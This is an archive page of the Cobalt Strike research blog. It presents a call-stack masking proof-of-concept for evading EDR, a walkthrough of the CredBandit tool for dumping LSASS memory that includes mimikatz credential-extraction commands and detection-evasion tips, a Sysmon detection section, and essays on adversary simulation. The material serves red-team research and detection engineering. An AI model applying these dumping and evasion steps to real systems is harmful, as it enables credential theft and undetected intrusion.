Adversary Simulation Archives - Cobalt Strike Research and Development
fortra logo

Behind the Mask: Spoofing Call Stacks Dynamically with Timers

This blog introduces a PoC technique for spoofing call stacks using timers. Prior to our implant sleeping, we can queue up timers to overwrite its call stack with a fake one and then restore the original before resuming execution. Hence, in the same way we can mask memory belonging to our implant during sleep, we can also mask the call stack of our main thread. Furthermore, this approach avoids having to deal with the complexities of X64 stack unwinding, which is typical of other call stack spoofing approaches. 

The Call Stack Problem

The core memory evasion problem from an attacker’s perspective is that implants typically operate from injected code (ignoring any module hollowing approaches). Therefore, one of the pillars of modern detection is to monitor for the creation of threads which belong to unbacked (or ‘floating’) memory. This blog by Elastic is a good approximation to the state of the art in terms of anomalous thread detection from an EDR perspective. 

However, another implication of this problem for attackers is that all the implants’ API calls will also originate from unbacked memory. By examining call stacks either at the time of a specific API invocation, or by proactively inspecting running threads (i.e. ones which are sleeping), suspicious call stacks can be identified via return addresses to unbacked memory.  

This is one detection area which historically has not received a huge amount of focus/research in modern EDR stacks (in my experience). However, this is starting to change with the release of open-source tools such as Hunt-Sleeping-Beacons, which will proactively inspect “sleeping” threads to find call stacks with unbacked regions. This demonstrably provides a high confidence signal of suspicious activity; hence it is valuable to EDRs and something attackers need to seriously consider in their evasion TTPs.  

Call Stack Inspection at Rest

The first problem to solve from an attacker’s perspective is how to manipulate the call stack of a sleeping thread so that it can bypass this type of inspection. This could be performed by the actual thread itself or via some external mechanism (APCs etc.).  

Typically, this is referred to as “spoofing at rest” (h/t to Kyle Avery here for this terminology in his excellent blog on avoiding memory scanners). The first public attempt to solve this problem is mgeeky’s ThreadStackSpoofer, which overwrites the last return address on the stack. 

As a note, the opposite way to approach this problem is by having no thread or call stack present at all, à la DeathSleep. The downside of this technique is the potential for the repeated creation of unbacked threads, (depends on the exact implementation), which is a much greater evil in modern environments. However, future use of Hardware Stack Protection by EDR vendors may make this type of approach inevitable. 

Call Stack Inspection During Execution – User Mode

The second problem is call stack inspection during execution, which could either be implemented in user mode or kernel mode. In terms of user mode implementation, this would typically involve hooking a commonly abused function and walking the stack to see where the call originated. If we find unbacked memory, it is highly likely to be suspicious. An obvious example of this is injected shellcode stagers calling WinInet functions. MalMemDetect is a good example of an open-source project that demonstrates this detection technique. 

For these scenarios, techniques such as RET address spoofing are normally sufficient to remove any evidence of unbacked addresses from the call stack. At a high level, this involves inserting a small assembly harness around the target function which will manually replace the last return address on the stack and redirect the target function to return to a trampoline gadget (e.g. jmp rbx). 

Additionally, there is SilentMoonWalk which uses a clever de-syncing approach (essentially a ROP gadget built on X64 stack unwinding codes). This can dynamically hide the origin of a function call and will similarly bypass these basic detection heuristics. Most importantly to an operator, both these techniques can be performed by the acting thread itself and do not require any external mechanism. 

From an opsec perspective, it is important to note that many of the techniques referenced in this blog may produce anomalous call stacks. Whether this is an issue or not depends on the target environment and the security controls in place. The key consideration is whether the call stack generated by an action is being recorded somewhere (say in the kernel, see next section) and appended to an event/alert. If this is the case, it may look suspicious to trained eyes (i.e. threat hunters/IR). 

To demonstrate this, we can take SilentMoonWalk’s desync stack spoofing technique as an example (this is a slightly easier use case as other techniques can be implementation specific).  As stated previously, this technique needs to find functions which implement specific stack winding operations (a full overview of X64 stack unwinding is beyond the scope of this blog but see this excellent CodeMachine article for further reading).  

For example, the first frame must always perform a UWOP_SET_FPREG operation, the second UWOP_PUSH_NONVOL (rbp) etc. as demonstrated in windbg below:

0:000> knf
#   Memory  Child-SP          RetAddr               Call Site 
00           0000001d`240feb98 00007ffe`b622d831     win32u!NtUserWaitMessage+0x14 
[…] 
08        40 0000001d`240ff140 00007ffe`b483b576     KERNELBASE!CreatePrivateObjectSecurity+0x31 
09        40 0000001d`240ff180 00007ffe`b48215a5     KERNELBASE!Internal_EnumSystemLocales+0x406 
0a       3e0 0000001d`240ff560 00007ffe`b4870e22     KERNELBASE!SystemTimeToTzSpecificLocalTimeEx+0x25 
0b       680 0000001d`240ffbe0 00007ffe`b6d87614     KERNELBASE!PathReplaceGreedy+0x82 
0c       100 0000001d`240ffce0 00007ffe`b71826a1     KERNEL32!BaseThreadInitThunk+0x14 
0d        30 0000001d`240ffd10 00000000`00000000     ntdll!RtlUserThreadStart+0x21 

0:000> .fnent KERNELBASE!PathReplaceGreedy+0x82 
Debugger function entry 000001cb`dda19c60 for: 
(00007ffe`b4870da0)   KERNELBASE!PathReplaceGreedy+0x82   |  (00007ffe`b4871050)   KERNELBASE!SortFindString
[…]  
  06: offs 13, unwind op 3, op info 2	UWOP_SET_FPREG.

0:000> .fnent KERNELBASE!SystemTimeToTzSpecificLocalTimeEx+0x25 
Debugger function entry 000001cb`dda19c60 for:  
(00007ffe`b4821580)   KERNELBASE!SystemTimeToTzSpecificLocalTimeEx+0x25   |  (00007ffe`b482182c)   KERNELBASE!AddTimeZoneRules 
[…] 
08: offs b, unwind op 0, op info 5	UWOP_PUSH_NONVOL reg: rbp. 

This output shows the call stack for the spoofed SilentMoonwalk thread (knf) and the unwind operations (.fnent) for two of the functions found on the call stack (PathReplaceGreedy / SystemTimeToTzSpecificLocalTimeEx). 

The key take away is that this results in a call stack which would never occur for a legitimate code path (and is therefore anomalous). Hence, KERNELBASE!PathReplaceGreedy does not call KERNELBASE!SystemTimeToTzSpecificLocalTimeEx … and so on. Furthermore, an EDR could itself attempt to search for this pattern of unwind codes during a proactive scan of a sleeping thread. Again, whether this is an issue depends entirely on the controls/telemetry in place but as operators it is always worth understanding the pros and cons of all the techniques at our disposal. 

Lastly, a trivial way of calling an API with a ‘clean’ call stack is to get something else to do it for you. The typical example is to use any callback type functionality provided by the OS (same applies for bypassing thread creation start address heuristics). The limitation for most callbacks is that you can normally only supply one argument (although there are some notable exceptions and good research showing ways around this). 

Call Stack Inspection During Execution – Kernel Mode

A user mode call stack can be captured inline during any of the kernel callback functions (ie. on process creation, thread creation/termination, handle access etc…). As an example, the SysMon driver uses RtlWalkFrameChain to collect a user mode call stack for all process access events (i.e. calling OpenProcess to obtain a HANDLE). Hence, this capability makes it trivial to spot unbacked memory/injected code (‘UNKNOWN’) attempting to open a handle to LSASS. For example, in this contrived scenario you would get a call stack similar to the following: 

0:020> knf 
#       Memory    Child-SP           RetAddr               Call Site 
00                0000004c`453cf428  00007ffd`7f1006fe     ntdll!NtOpenProcess 
01           8    0000004c`453cf430  00007ff6`98fe937f     KERNELBASE!OpenProcess+0x4e 
02          70    0000004c`453cf4a0  000002ad`c3fd1121     000002ad`c3fd1121 (UNKNOWN) 

Additionally, it is now possible to collect call stacks with the ETW threat intelligence provider.  The call stack addresses are unresolved (i.e. an EDR would need to keep its own internal process module cache to resolve symbols) but they essentially enable EDR vendors the potential to capture near real time call stacks (where the symbols are then resolved asynchronously). Therefore, this can be seen as a direct replacement for user mode hooking which is, critically, captured in the kernel. It is not unrealistic to imagine a scenario in the future in which unbacked/direct API calls to sensitive functions (VirtualAlloc / QueueUserApc / SetThreadContext / VirtualProtect etc.) are trivial to detect. 

These scenarios were the premise for some of my own previous research in to call stack spoofing during execution: https://github.com/WithSecureLabs/CallStackSpoofer. The idea was to offload the API call to a new thread, which we could initialise to a fake state, to hide the fact that the call originated from unbacked memory. My original PoC applied this idea to OpenProcess but it could easily be applied to image loads etc.  

The key requirement here was that any arbitrary call stack could be spoofed, so that even if a threat hunter was reviewing an alert containing the call stack, it would still look indistinguishable from other threads. The downsides of this approach were the need to create a new thread, how best to handle this spoofed thread, and the reliance on a hard coded / static call stack.

Call Stack Masking

Having given a brief review of the current state of research in to call stack spoofing, this blog will demonstrate a new call stack spoofing technique: call stack masking. The PoC introduced in this blog post solves the spoofing at rest problem by masking a sleeping thread’s call stack via an external mechanism (timers). 

While researching this topic in the past, I spent a large amount of time trying to get to grips with the complexities of X64 stack unwinding in order to produce TTPs to perform stack spoofing. This complexity is also present in a number of the other techniques discussed above. However, it occurred to me that there is a much simpler way to spoof/mask the call stack without having to deal with these intricacies. 

If we consider a generic thread that is performing any kind of wait, by definition, it cannot modify its own stack until the wait is satisfied. Furthermore, its stack is always read-writable. Therefore, we can use timers to:

  1. Create a backup of the current thread stack
  2. Overwrite it with a fake thread stack
  3. Restore the original thread stack just before resuming execution 

Any timer objects could be used, but for convenience I based my PoC on C5Spider’s Ekko sleep obfuscation technique.  

The only remaining challenge is to work out the value of RSP once our target thread is sleeping. This can be achieved using compiler intrinsics (_AddressOfReturnAddress) to obtain the Child-SP of the current frame. Once we have this, we can subtract the total stack utilisation of the expected next two frames (i.e. KERNELBASE!WaitForSingleObjectEx and ntdll!NtWaitForSingleObject) to find the expected value of RSP at sleep time.

Lastly, to make our masked thread look as realistic as possible, we can copy the start address and call stack of an existing (and legitimate) thread.

PoC || GTFO

The PoC can be found here: https://github.com/Cobalt-Strike/CallStackMasker

The PoC operates in two modes: static and dynamic. The static mode contains a hard coded call stack that was found in spoolsv.exe via Process Explorer. This thread is shown below and can be seen to be in a state of ‘Wait:UserRequest’ via KERNELBASE!WaitForSingleObjectEx:

The screenshot below demonstrates static call stack masking. The start address and call stack of our masked thread are identical to the thread identified in spoolsv.exe above:

The obvious downside of the static mode is that we are still relying on a hard coded call stack. To solve this problem the PoC also implements dynamic call stack masking. In this mode, it will enumerate all the accessible threads on the host and find one in the desired target state (i.e. UserRequest via WaitForSingleObjectEx). Once a suitable thread stack is found, it will copy it and use that to mask the sleeping thread. Similarly, the PoC will once again copy the cloned thread’s start address to ensure our masked thread looks legitimate.

If we run the PoC with the ‘–dynamic’ flag, it will locate another thread’s call stack to mimic as shown below: 

The target process (taskhostw.exe / 4520), thread (5452), and call stack identified above are shown below in Process Explorer:

If we now examine the call stack and start address of the main thread belonging to CallStackMasker, we can see it is identical to the mimicked thread:

Below is another example of CallStackMasker dynamically finding a shcore.dll based thread call stack from explorer.exe to spoof: 

The screenshot below shows the real ‘unmasked’ call stack:

Currently the PoC only supports WaitForSingleObject but it would be trivial to add in support for WaitForMultipleObjects.

As a final note, this PoC uses timer-queue timers, which I have previously demonstrated can be enumerated in memory: https://github.com/WithSecureLabs/TickTock. However, this PoC could be modified to use fully fledged kernel timers to avoid this potential detection opportunity. 

CredBandit (In memory BOF MiniDump) – Tool review – Part 1

One of the things I find fascinating about being on the Cobalt Strike team is the community. It is amazing to see how people overcome unique challenges and push the tool in directions never considered. I want explore this with CredBandit (https://github.com/xforcered/CredBandit). This tool has had updates since I started exploring. I’m specifically, looking at this version for this blog post.

In part 2, I ‘ll explore the latest version and how it uses an “undocumented” feature to solve the challenges discussed in this post.

Per the author:

CredBandit is a proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel. The memory dump is done by using NTFS transactions, which allows us to write the dump to memory. Additionally, the MiniDumpWriteDump API has been replaced with an adaptation of ReactOS’s implementation of MiniDumpWriteDump.
When you dig into this tool,  you will see that CredBandit is “just another minidump tool.” This is true, but there are some interesting approaches to this.
My interest in CredBandit is less from the minidump implementation but the “duct tape engineering” used to bend Beacon to anthemtotheego‘s will.

CredBandit uses an unconventional way of transferring in memory data through Beacon by overloading the BEACON_OUTPUT aggressor function to handle data sent from BeaconPrintf() function.

There are other interesting aspects to this project, namely:

    • Beacon Object File (BOF) using direct syscalls
    • In memory storage of data (The dump does not need to be written to disk)
    • ReactOS implementation of MiniDumpWriteDump
You can read more about the minidump technique here (T1003-001) or here (Dump credentials from lsass without mimikatz).

Note on the Defense Perspective

Although the focus on this post is to highlight an interesting way to bend Cobalt Strike to a user’s will, it does cover a credential dumping technique. Understanding detection opportunities of techniques vs. tools is an important concept in security operations. It can be helpful to highlight both the offense capabilities and defense opportunities of a technique. I’ve invited Jonny Johnson (https://twitter.com/jsecurity101) to add context to the detection story of this technique, seen below in the Detection Opportunities section.

Quick Start

Warning: BOFs run in Beacon’s memory. If they crash, Beacon crashes. The stability of this BOF may not be 100% reliable. Beacons may die. It’s something to consider if you choose to use this or any other BOF.

CredBandit is easy to use, but don’t that fool you into thinking it isn’t a clever approach to creating a minidump. All the hard work has been done, and you only need a few commands to use it.

The basic process is as follows:

  1. Clone the project: https://github.com/xforcered/CredBandit
  2. Compile CredBandit to a BOF
  3. Load the aggressor script in Cobalt Strike
  4. Launch a beacon running in context with the necessary permissions (i.e., high integrity process running as administrator)
  5. Locate the PID of LSASS
  6. Run CredBandit
  7. Wait …. 🙂
  8. Convert the CredBandit output into a usable dump
  9. Use Mimikatz to extract information from the dump

Consult the readme for details.

Let’s See This in Action

Load the aggressor script from the Cobalt Strike manager

Get the PID of LSASS

Interact with a beacon running with the permissions needed to dump LSASS memory and get the PID of LSASS.

An output of PS gives us a PID of 656.

Run CredBandit to capture the minidump of LSASS

Loading the MiniDumpWriteDump.cna aggressor script added the command credBandit to Beacon.

Running help shows we only need the PID of LSASS to use the command credBandit.

This will take time. Beacon may appear to be unresponsive, but it is processing the minidump and sending back chunks of data by hijacking the BeaconPrintf function. In this example, over 80mb in data must be transferred.

Once the Dump is complete, Beacon should return to normal. A word of caution: I had a few Beacons die after the process completed. The data was successfully transferred, but the Beacon process died. This could be due to the BOF being functional but missing error handling, but I did not investigate.

NOTE: The CredBandit aggressor script, MiniDumpWriteDump.cna, changed the behavior of BEACON_OUTPUT. This can cause other functions to fail. You should unload the script and restart the Cobalt Strike client or use RevertMiniDumpWriteDump.cna to reverse the changes.

Convert the extracted data to a usable format

The file dumpFile.txt is created in the cobaltstrike directory. This file is the result generated by  “highjacking” the BEACON_OUTPUT function to write the received chunks of data from the BeaconPrintf function.

Run the cleanupMiniDump.sh command to convert this file back into something useful:

./cleanupMiniDump.sh

You will now have two new files in the cobaltstrike directory: .dmp and .txt.

The .txt is a backup of the original dumpFile.txt.

The .dmp is the minidump file of LSASS.

Use Mimikatz to extract information from the dump

At this point, we are done with CredBandit. It provided the dump of LSASS. We can now use Mimikatz offline to extract information.

You can use something like the following commands:

mimikatz
mimikatz # sekurlsa::minidump c:\payloads\credBandit\lsass.dmp
mimikatz # sekurlsa::logonPasswords



BTW, dontstealmypassword


Demo

Here is a quick demo of the tool.


Breaking down the key concepts

Beacon Object File (BOF) using direct syscalls

Direct syscalls can provide a way of avoiding API hooking from security tools by avoiding the need for calling these APIs.

CredBandit uses much of work done by Outflank on using Syscall in Beacon Object Files. I won’t spend time on this but here are great resources:

In memory storage of data

The minidump output is stored in Beacon’s memory vs. being written to disk. This is based on using a minidump implementation that uses NTFS transactions to write to memory: https://github.com/PorLaCola25/TransactedSharpMiniDump

ReactOS implementation of MiniDumpWriteDump

MiniDumpWriteDump API is replaced with an adaptation of ReactOS’s implementation of MiniDumpWriteDump: https://github.com/rookuu/BOFs/tree/main/MiniDumpWriteDump

Unconventional way of transferring in memory data through Beacon via overloaded BeaconPrintf() function

This is what I find most interesting about this project. In short, the BEACON_OUTPUT aggressor function is used to send the base64 encode dump it receives as chunks from BeaconPrintf. These chunks are written to a file that can be cleaned up and decoded.

How does this hack work? It’s clever and simple. The BOF uses the BeaconPrintf function to send chunks of the base64 encoded minidump file to the teamserver. This data is captured and written to a file on disk.

The following is an example of the output file:

received output:
TURNUJOnAAAEAAAAIAAAAAAAAAAAAAAAIggAAAAAAAAHAAAAOAAAAFAAAAAEAAAAdCMAAIwAAAAJAAAAUCQAAMI6AAAAAAAAAAAAAAAAAAA...
received output:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABolPx/AAAA4AkACJUKAP2mu1yUJQAAvQTv/gAAAQAAAAcAAQDuQgAACgABAO5CPwAAAAA...
received output:
AAAAAAAAAAAAAAAAAAAAAAAAAAC5kPx/AAAAoA4A94kOABHEhU5sJwAAvQTv/gAAAQACAAYAAQDuQgAACgABAO5CPwAAAAAAAAAEAAQAAgA...
received output:
AAAAAAAAAAAAAAAYkfx/AAAAoAcADk4IABy/Gt86KQAAvQTv/gAAAQACAAYAAQDuQgAACgABAO5CPwAAAAAAAAAEAAQAAgAAAAAAAAAAAAA...

This minidump file is rebuilt using the script cleanupMiniDump.sh. Credential material can be extracted using Mimikatz.


 Adjusting the Technique

The heart of this technique is based on accessing and dumping LSASS. Instead of using the suspicious activity of payload.exe accessing lsass.exe, you could find a process that regularly accesses LSASS, inject into that process, and perform your dump.

The BOF (https://github.com/outflanknl/FindObjects-BOF) may help you locate a process that has a handle to lsass.exe using similar OPSEC as CredBandit by using a BOF and direct systems calls. FindObjects-BOF is “A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific modules or process handles.

Give it a try!


Detection Opportunities

Although the focus on this post was to highlight an interesting way to bend Cobalt Strike to a user’s will, it does cover a credential dumping technique. Understanding detection opportunities of techniques vs. tools is an important concept in detection engineering. I’ve invited Jonny Johnson (https://twitter.com/jsecurity101) to provide context to the detection story of this technique.

Jonny’s detection note are in the left column, and I hae added my take in the right.

Detection Story by Jonny Joe’s comments
Before we can start creating our detection we must identify what is the main action of this whole chain – opening a handle to LSASS. That will be the core of this detection. If we detect on the tool or code specifically, then we lose detection visibility once someone creates another code that uses different functions. By focusing on the technique’s core behavior, we prevent manually creating a gap in our detection strategy. For this piece I am going to leverage Sysmon Event ID: 10 – Process Accessed. This event allows me to see the source process that was requesting access to the target process, the target process, the granted access rights (explained in a moment), along with both the source process GUID and target process GUID.

Sysmon Event ID 10 fires when OpenProcess is called, and because Sysmon is a kernel driver, it has insight into OpenProcess in both user-mode and kernel-mode. This particular implementation uses a syscall for NtOpenProcess within ntdll.dll, which is the Native API version of the Win32 API OpenProcess.

How is this useful?

Within the NtOpenProcess documentation, there is a parameter called DesiredAccess.This correlates to the ACCESS_MASK type, which is a bitmask. This access is typically defined by the function that wants to obtain a handle to a process. OpenProcess acts as a middle man between the function call and the target process. The function in this instance is MiniDumpWriteDump. Although ReactOS’s implementation of MiniDumpWriteDump is being used, we are still dealing with Windows securable objects (e.g. processes and files). Due to this, we must follow Windows built-in rules for these objects. Also, ReactOS’s MiniDumpWriteDump is using the exact same parameters as Microsoft’s MiniDumpWriteDump API.

Don’t overemphasize tools. Fundamentally, this technique is based on the detection a process accessing LSASS.

ReactOS’s MiniDumpWriteDump is using the exact same parameters as Microsoft’s MiniDumpWriteDump API.” It is important to focus on the technique’s primitives. There can be multiple implementations by different tools but the technique can often be broken down in to primitives.

Within Microsoft’s documentation, we can see that if MiniDumpWriteDump wants to obtain a handle to a process, it must have PROCESS_QUERY_IMFORMATION & PROCESS_VM_READ access to that process, which we can see is requested in the CredBandit source code below:

However, this still isn’t the minimum rights that a process needs to perform this action on another process. After reading Microsoft’s Process Security and Access Rights we can see that anytime a process is granted PROCESS_QUERY_IMFORMATION, it is automatically granted PROCESS_QUERY_LIMITED_IMFORMATION. This has a hex value of 0x1410 (this will be used in the analytic later).

Next, we want to see the file created via NtCreateTransacted. Sysmon uses a minifilter driver to monitor file system’s stacks indirectly, so it has insight into files being written to disk or a phantom file. One thing we have to be careful with is that we don’t know the extension the actor might have for the dump file. Bottom line: this is attacker-controlled and if we specify this into our analytic we risk creating a blind spot, which can lead to an analytical bypass.

Lastly, a little icing on the cake would be to add a process creation event to this analytic as it would just provide context around which user was leveraged for this activity.

Data Sources/Events:

User Rights:

Process Access:

File Creation:

  • Sysmon Event ID 11

Process Creation:

A detection strategy hypothesis should account for potential blind spots. Blind spots are not bad, but should be identified. https://posts.specterops.io/detection-in-depth-a2392b3a7e94

Analytics:

The following analytics are not meant to be copy and paste, but more of the beginning of detection for your environment. If you only look for the access rights 0x1410, then you will create a blind spot if an actor uses ReadProcessMemory to dump LSASS. Ideally, multiple detections would be made for dumping LSASS so that blind spots could be covered along the way.

Sysmon EID 10 Process Access

Regarding Detection:

Multiple combinations of access rights may be requested based on the implementation. Focus on a query to cover minimal rights needed. This will reduce blind spots based on a specific implementation.

Regarding OPSEC:

Notice that payload.exe is accessing lsass.exe. This is due to this implementation as a BOF running directly under the context of Beacon.

BOF and syscalls can be great, but maintain OPSEC awareness.

Sysmon EID 10 & EID 11

Sysmon EID 10, 11, & 1

Detection Summary

When writing a detection the first thing I do is identify the capabilities that a tool and/or technique has. This helps me narrow in on a scope. A piece of code could be implementing 3-4 techniques. When this happens, I separate these techniques and look into them separately. This allows me to create a detection strategy per capability.
When the capability is identified and the components being used are highlighted, proper scoping can be applied. We can see a commonality between this implementation and many others. That commonality is MiniDumpWriteDump and the access rights needed for that function call. This is the foundation of our detection or base condition. However, this could be evaded if an actor uses ReadProcessMemory because there are a different set of minimum access rights needed. A separate detection would need to be created for this function. This is ideal as it applies an overlap of our detection to cover the blind spots that are related to a technique.
Pulling attributes like file creation and process creation are contextual attributes that can be applied back to the core detection (MiniDump). The detection shouldn’t rely on these attributes because they are not guaranteed to be present.

Cobalt Strike is not inherently malicious. It is simply a way for someone to implement an action. The intent behind that action is what determines a classification of malicious or benign. Consequently, I don’t focus on Cobalt Strike specific signatures, I look at the behavior/technique being implemented.

I like how Palantir outlines a method for documenting detection strategies using their Alerting and Detection Strategy Framework (ADS).
Jonny Johnson (https://twitter.com/jsecurity101)

Thanks to https://twitter.com/anthemtotheego  for creating this tool.

Stay tuned for part 2 where I ‘ll talk about how the latest version uses an “undocumented” feature to download the minidump file instead of hijacking the BEACON_OUTPUT function.

Conclusion

Wait?!?! This post highlighted the need to ‘hack’ Cobalt Strike because of a lack of features.  Why isn’t this part of the toolset?

Cobalt Strike is a framework. It is meant to be tuned to fit a user’s need. Projects like this help expose areas that can be improved. This helps the team add new features, update documentation, or provide examples.

References

Detection References:

The Threat Emulation Problem

There are a lot of people who talk about threat emulation. Use our super-duper-elitesy-neatsy-malware to emulate these tactics in your network. I say stuff like that too. It’s cool. In this post, I’d like to write about what threat emulation means to me, really.

I see a red teams as offensive operators capable of executing attacks as an advanced representative actor. By representative actor, I mean one that may have similar sophistication to what their customer faces day-to-day, but the actions of the red team are solely theirs. The red team has their own tradecraft, their own process, and their own way of doing things. They’re not really emulating anyone else [although, like all good offensive actors, they’re happy to blatantly borrow what works from others].

What is the value of these red team operations? I covered this topic in Models for Red Team Operations. I see red teams provide a lot of value when they work to exercise a security process in a comprehensive way.

So far, we’ve established: a red team is a representative actor. Fine. What’s a threat emulator then? A threat emulator is an offensive operator who emulates a specific threat in a network. What is the value of a specific threat over a representative threat? Analysis. As a representative actor, there’s little room to exercise and evaluate a training audience’s ability to analyze the incident, tie it to threat intelligence, and possibly cross-share it with others. If a team emulates a specific actor, ideally, there’s a wealth of information for incident response teams to draw on to better inform their actions and drive their process.

If threat emulation is emulating a specific threat AND the purpose behind this is to exercise analysis, then what is the threat emulation problem?

The threat emulation problem is fooling an analyst into believing they’re dealing with a real-world actor during a simulated incident.

There are a lot of approaches to this problem. One approach is to use the actor’s malware when it’s available. Another approach is to dress up a payload to have indicators that are similar to the emulated actor’s malware. This is the approach Cobalt Strike takes with its Malleable C2 technology.

I’ve had an interest in the Threat Emulation problem for a while. Here are a few resources on it:

If you’d like to learn more about Threat Emulation with Cobalt Strike, take a look at Puttering my Panda and Other Threat Replication Case Studies. This blog post shows how to dissect a threat intelligence report and use Cobalt Strike to emulate targeted attacks and indicators from three actors.

If you’d like to learn more about the Threat Emulation problem set, watch 2014’s Hacking to Get Caught. In this talk I discuss what it means to emulate a threat during a red team assessment. I go through approaches other than my own. I then discuss my thoughts on the Threat Emulation problem and potential solutions. This talk pre-dates the release of Malleable C2.

If you’d like thoughts on how Threat Emulation fits into the broader shifts taking place in our industry, watch 2015’s Hacking to Get Caught talk. The content of this talk is different from the 2014 talk. Hacking to Get Caught discusses Adversary Simulations, Cyber Security Exercises, and a trend towards using offensive assets to test and evaluate security operations. I see Threat Emulation as a way to exercise analysis (when that’s the goal). You may also want to look at Raphael’s Magic Quadrant. This blog post summarizes my thoughts on these broad shifts.

Raphael’s Magic Quadrant

BlackHat is about to start in a few days. I think this is an appropriate time to share a non-technical, business only post.

There is a new market for offensive tools and services. Our trade press doesn’t write about it yet. I don’t believe industry analysts have caught onto these ideas yet. The leaders behind mature security programs have converged on these ideas, in isolation of each other. I see several forward-thinking consulting firms aligning in this direction as well. I also see movement towards these ideas in a variety of sectors. This isn’t limited to banks, the government, or the military.

The Sword that Hones the Shield

Today’s market for penetration testing software and services is driven by a need to find vulnerabilities in a network and build a prioritized list of things to fix to make it safe. The services and tools in this market reflect this problem set.

What happens when an attacker gets in? It happens, even in the most well maintained networks. At this point all is not lost. This is where security operations comes in. This is the part of a security program designed to detect and respond to an intrusion before it becomes a major incident.

Security Operations is a big investment. There is no lack of devices on the market that promise to stop the APT or detect 99.9% of malware that the vendor tested. When a breach happens, in the presence of these devices, the vendor usually claims the customer didn’t use their magical dust correctly. These devices are all very expensive.

Beyond the devices comes the monitoring staff. These are the folks who watch the APT boxes and other sensors to determine if there is malicious activity on their network. Some organizations outsource this to a Managed Security Services Provider. Others have an in-house staff to do this. Either way, this is an on-going cost that organizations pay to protect their business if an intrusion occurs.

Security Operations is not just passive monitoring. At the high end of the market, security operations also involves highly skilled analysts who deploy agents that collect details about user and process behavior that were previously unavailable. These agents generate a lot of data. The collection, processing, and analysis of this data is difficult to do at scale. Because of this, these analysts usually instrument systems and investigate when another form of monitoring tips them off. These highly skilled analysts have the task to find signs of an intrusion, understand it in full, and develop a strategy to delay the actor until they know the best way to remove the actor from their network altogether. This is often called Hunt.

If an organization invests into security operations in any way, they have an obligation to validate that investment and make sure these parts of their security program work. This problem set is the driver behind this new market for offensive services and tools.

Adversary Simulations

The new service I speak of has a number of names. Adversary Simulation is one name. Threat Emulation is another. Red Team-lite is a term my friends and I use to joke about it. The concept is the same. An offensive professional exercises security operations by simulating an adversary’s actions.

In these engagements, how the attacker got in doesn’t matter as much. Every step of the attacker’s process is an opportunity for security operations staff to detect and respond to the intruder. Some engagements might emulate the initial steps an attacker takes after a breach. These initial steps to escalate privileges and take over the domain are worthwhile opportunities to catch an attacker. Other engagements might emulate an attacker who owns the domain and has had a presence on the network for years. The nice thing about this model is each of these engagements are scoped to exercise and train security operations staff on a specific type of incident.

I’ve written about Adversary Simulations before. I’ve also spoken about them a few times. My recent updated thoughts were shared at Converge in Detroit a few weeks go:

Adversary Simulations focus on a different part of the offensive process than most penetration tests. Penetration Tests tend to focus on access with a yelp for joy when shell is gained. Adversary Simulations focus almost entirely on post-exploitation, lateral movement, and persistence.

The tool needs for Adversary Simulations are far different. A novel covert channel matters far more than an unpatched exploit. A common element of Adversary Simulations is a white box assume breach model. Just as often as not, an Adversary Simulation starts with an assumed full domain compromise. The goal of the operator is to use this access to achieve effects and steal data in ways that help exercise and prepare the security operations staff for what they’re really up against.

Adversary Simulation Tools

What tools can you use to perform Adversary Simulations? You can build your own. PowerShell is a common platform to build custom remote access tools on an engagement by engagement basis. Microsoft’s red team follows this approach. One of my favorite talks: No Tools, No Problem: Building a Custom Botnet in PowerShell (Chris Campbell, 2012) goes through this step-by-step.

Cobalt Strike’s Beacon has shown itself as an effective Adversary Simulation tool. My initial focus on the needs of high-end red teams and experience with red vs. blue exercises has forced me to evolve a toolset that offers asynchronous post-exploitation and covert communication flexibility. For example, Malleable C2 gives Beacon the flexibility to represent multiple toolsets/actors in one engagement. Beacon Operators rely on native tools for most of their post-exploitation tasks. This approach lends itself well to emulating a quiet advanced threat actor. Cobalt Strike 3.0 will double down on this approach:

Immunity has their Innuendo tool. I’ve kept my eye on Innuendo since Immunity’s first announcement. Innuendo is an extensible post-exploitation agent designed to emulate the post-intrusion steps of an advanced adversary with an emphasis on covert channels. Innuendo is as much a post-exploitation development framework as it is a remote access tool. Immunity also offers an Adversary Simulation service. I’m convinced, at this point, that Immunity sees this market in a way that is similar to how I see it.

One of the company’s doing a lot to push red team tradecraft into penetration tests is the Veris Group. Will Schroeder has done a lot in the offensive powershell space to support the needs of red team operators. The things Will works on don’t come from a brainstorming session. They’re the hard needs of the engagements he works on. At B-Sides Las Vegas, he and his colleague Justin Warner will release a post-exploitation agent called Empire. This isn’t yet-another-powershell post-exploitation agent. It’s documented, polished, AND it builds on some novel work to run PowerShell in an unmanaged process. This talk was rejected by other conferences and I believe the conference organizers made a mistake here. Empire is the foundation of a well thought out Adversary Simulation tool.

You’ll notice that I talk a lot about the playing field of Adversary Simulation tools today. I think each of these options is a beginning, at best. We as an industry have a long ways to go to support the needs to make professional Adversary Simulations safe, repeatable, and useful for the customers that buy them.

Adversary Simulation Training

The tools for Adversary Simulation are coming. The tools alone are not the story. Adversary Simulations require more than good tools, they require good operators.

A good Adversary Simulation Operator is one who understands system administration concepts very well. Regardless of toolset, many Adversary Simulation Tasks are do-able with tools built into the operating system.

A good Adversary Simulation Operator is also one who understands what their actions look like to a sensor and they appreciate which points a sensor has to observe and alert on their action. This offense-in-depth mindset is key to evade defenses and execute a challenging scenario.

Finally, Adversary Simulations require an appreciation for Tradecraft that simply isn’t there in the penetration testing community yet. Tradecraft are the best practices of a modern Adversary. What is the adversary’s playbook? What checklists do they follow? Why do they do the things they do?

I see some of my peers dismiss foreign intelligence services as script kiddies, equal to or beneath penetration testers in capability. This makes me cringe. This hubris is not the way forward for effective Adversary Simulations. Adversary Simulations will require professionals with an open mind and an appreciation for other models of offense.

Right now, the best source of information on Tradecraft is the narrative portion of well written and informed Threat Intelligence reports. A good Adversary Simulation Operator will know how to read a good report, speculate about the adversary’s process, and design an operating concept that emulates that process. CrowdStrike’s Adversary Tricks and Treats blog post is an example of a good narrative. Kaspersky’s report on Duqu 2.0 also captures a lot of key details about how the actor does lateral movement and persistence. For example, the actor that operates with Duqu 2.0 uses MSI packages kicked off with schtasks for lateral movement. Why would this quiet advanced actor do this? What’s the benefit to them? A good Adversary Simulation Operator will ask these questions, come to their own conclusions, and figure out how to emulate these actions in their customer’s networks. These steps will help their customers get better at developing mitigations and detection strategies that work.

